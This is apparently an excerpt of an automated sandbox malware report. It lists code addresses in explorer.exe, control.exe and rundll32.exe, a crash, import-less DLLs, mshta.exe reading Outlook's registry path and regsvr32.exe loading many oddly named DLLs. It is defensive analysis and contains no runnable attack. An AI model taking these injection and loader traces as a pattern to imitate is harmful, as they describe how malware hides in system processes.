Source: C:\Windows\explorer.exe	Code function: 30_2_04DE60E4	30_2_04DE60E4
Source: C:\Windows\explorer.exe	Code function: 30_2_04DFDCE4	30_2_04DFDCE4
Source: C:\Windows\explorer.exe	Code function: 30_2_04E00C88	30_2_04E00C88
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF5030	30_2_04DF5030
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF19D4	30_2_04DF19D4
Source: C:\Windows\explorer.exe	Code function: 30_2_04DEC9D0	30_2_04DEC9D0
Source: C:\Windows\explorer.exe	Code function: 30_2_04DE95A8	30_2_04DE95A8
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF8D74	30_2_04DF8D74
Source: C:\Windows\explorer.exe	Code function: 30_2_04DE1EFC	30_2_04DE1EFC
Source: C:\Windows\explorer.exe	Code function: 30_2_04DEDEF0	30_2_04DEDEF0
Source: C:\Windows\explorer.exe	Code function: 30_2_04DE4E94	30_2_04DE4E94
Source: C:\Windows\explorer.exe	Code function: 30_2_04E04290	30_2_04E04290
Source: C:\Windows\explorer.exe	Code function: 30_2_04DEAA50	30_2_04DEAA50
Source: C:\Windows\explorer.exe	Code function: 30_2_04DECE44	30_2_04DECE44
Source: C:\Windows\explorer.exe	Code function: 30_2_04E07A5C	30_2_04E07A5C
Source: C:\Windows\explorer.exe	Code function: 30_2_04E0062C	30_2_04E0062C
Source: C:\Windows\explorer.exe	Code function: 30_2_04DFB210	30_2_04DFB210
Source: C:\Windows\explorer.exe	Code function: 30_2_04DF6A34	30_2_04DF6A34
Source: C:\Windows\explorer.exe	Code function: 30_2_04DE7FCC	30_2_04DE7FCC
Source: C:\Windows\explorer.exe	Code function: 30_2_04DFD3A0	30_2_04DFD3A0
Source: C:\Windows\explorer.exe	Code function: 30_2_04E08320	30_2_04E08320
Source: C:\Windows\explorer.exe	Code function: 30_2_04DE2F0C	30_2_04DE2F0C
Source: C:\Windows\explorer.exe	Code function: 30_2_04E08B18	30_2_04E08B18
Source: C:\Windows\System32\control.exe	Code function: 31_2_008EF8AC	31_2_008EF8AC
Source: C:\Windows\System32\control.exe	Code function: 31_2_008EE2F0	31_2_008EE2F0
Source: C:\Windows\System32\control.exe	Code function: 31_2_00906A5C	31_2_00906A5C
Source: C:\Windows\System32\control.exe	Code function: 31_2_00909494	31_2_00909494
Source: C:\Windows\System32\control.exe	Code function: 31_2_00900C88	31_2_00900C88
Source: C:\Windows\System32\control.exe	Code function: 31_2_008EC0C0	31_2_008EC0C0
Source: C:\Windows\System32\control.exe	Code function: 31_2_008E48E8	31_2_008E48E8
Source: C:\Windows\System32\control.exe	Code function: 31_2_008E60E4	31_2_008E60E4
Source: C:\Windows\System32\control.exe	Code function: 31_2_008FDCE4	31_2_008FDCE4
Source: C:\Windows\System32\control.exe	Code function: 31_2_008F0C34	31_2_008F0C34
Source: C:\Windows\System32\control.exe	Code function: 31_2_008F5030	31_2_008F5030
Source: C:\Windows\System32\control.exe	Code function: 31_2_008FA054	31_2_008FA054
Source: C:\Windows\System32\control.exe	Code function: 31_2_00900180	31_2_00900180
Source: C:\Windows\System32\control.exe	Code function: 31_2_008E95A8	31_2_008E95A8
Source: C:\Windows\System32\control.exe	Code function: 31_2_008F19D4	31_2_008F19D4
Source: C:\Windows\System32\control.exe	Code function: 31_2_008EC9D0	31_2_008EC9D0
Source: C:\Windows\System32\control.exe	Code function: 31_2_008EBD6C	31_2_008EBD6C
Source: C:\Windows\System32\control.exe	Code function: 31_2_008F8D74	31_2_008F8D74
Source: C:\Windows\System32\control.exe	Code function: 31_2_00904290	31_2_00904290
Source: C:\Windows\System32\control.exe	Code function: 31_2_008E4E94	31_2_008E4E94
Source: C:\Windows\System32\control.exe	Code function: 31_2_008E1EFC	31_2_008E1EFC
Source: C:\Windows\System32\control.exe	Code function: 31_2_008EDEF0	31_2_008EDEF0
Source: C:\Windows\System32\control.exe	Code function: 31_2_008EF204	31_2_008EF204
Source: C:\Windows\System32\control.exe	Code function: 31_2_008FB210	31_2_008FB210
Source: C:\Windows\System32\control.exe	Code function: 31_2_008F6A34	31_2_008F6A34
Source: C:\Windows\System32\control.exe	Code function: 31_2_0090062C	31_2_0090062C
Source: C:\Windows\System32\control.exe	Code function: 31_2_008ECE44	31_2_008ECE44
Source: C:\Windows\System32\control.exe	Code function: 31_2_00907A5C	31_2_00907A5C
Source: C:\Windows\System32\control.exe	Code function: 31_2_008EAA50	31_2_008EAA50
Source: C:\Windows\System32\control.exe	Code function: 31_2_008FD3A0	31_2_008FD3A0
Source: C:\Windows\System32\control.exe	Code function: 31_2_008E7FCC	31_2_008E7FCC
Source: C:\Windows\System32\control.exe	Code function: 31_2_008E2F0C	31_2_008E2F0C
Source: C:\Windows\System32\control.exe	Code function: 31_2_00908B18	31_2_00908B18
Source: C:\Windows\System32\control.exe	Code function: 31_2_00908320	31_2_00908320
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5530F8AC	35_2_000001ED5530F8AC
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5530E2F0	35_2_000001ED5530E2F0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55320180	35_2_000001ED55320180
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55318D74	35_2_000001ED55318D74
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5530BD6C	35_2_000001ED5530BD6C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED553095A8	35_2_000001ED553095A8
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5530F204	35_2_000001ED5530F204
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5530C9D0	35_2_000001ED5530C9D0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED553119D4	35_2_000001ED553119D4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5530CE44	35_2_000001ED5530CE44
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55316A34	35_2_000001ED55316A34
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5532062C	35_2_000001ED5532062C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5531B210	35_2_000001ED5531B210
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55320C88	35_2_000001ED55320C88
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5531A054	35_2_000001ED5531A054
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5530C0C0	35_2_000001ED5530C0C0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55329494	35_2_000001ED55329494
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5531DCE4	35_2_000001ED5531DCE4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED553060E4	35_2_000001ED553060E4
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED553048E8	35_2_000001ED553048E8
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55307FCC	35_2_000001ED55307FCC
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5531D3A0	35_2_000001ED5531D3A0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55315030	35_2_000001ED55315030
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55310C34	35_2_000001ED55310C34
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5530AA50	35_2_000001ED5530AA50
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55326A5C	35_2_000001ED55326A5C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55327A5C	35_2_000001ED55327A5C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55324290	35_2_000001ED55324290
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55304E94	35_2_000001ED55304E94
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55302F0C	35_2_000001ED55302F0C
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED5530DEF0	35_2_000001ED5530DEF0
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55301EFC	35_2_000001ED55301EFC
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55328320	35_2_000001ED55328320
Source: C:\Windows\System32\rundll32.exe	Code function: 35_2_000001ED55328B18	35_2_000001ED55328B18

One or more processes crash

Source: unknown

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4540 -s 948

PE file does not import any functions

Source: 40soah3l.dll.26.dr	Static PE information: No import functions for PE file found
Source: kpzypqek.dll.28.dr	Static PE information: No import functions for PE file found

Searches for the Microsoft Outlook file path

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Tries to load missing DLLs

Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: @ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ? .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: > .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: = .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: < .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ; .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: : .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 9 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 8 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 7 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 6 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 5 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 4 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 3 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 2 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 1 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: 0 .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: - .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: , .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: + .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: * .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ) .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ( .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: & .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: % .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: $ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: # .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ' .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ! .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ~ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: } .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: \| .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: { .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: r .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: q .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: p .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: o .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: n .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: m .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: l .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: k .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: j .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: i .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: h .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: g .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: f .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: e .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: d .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: c .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: b .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: a .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ` .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: _ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ^ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: ] .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: [ .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: z .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: y .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: x .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: w .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: v .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: u .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: t .dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: s .dll	Jump to behavior
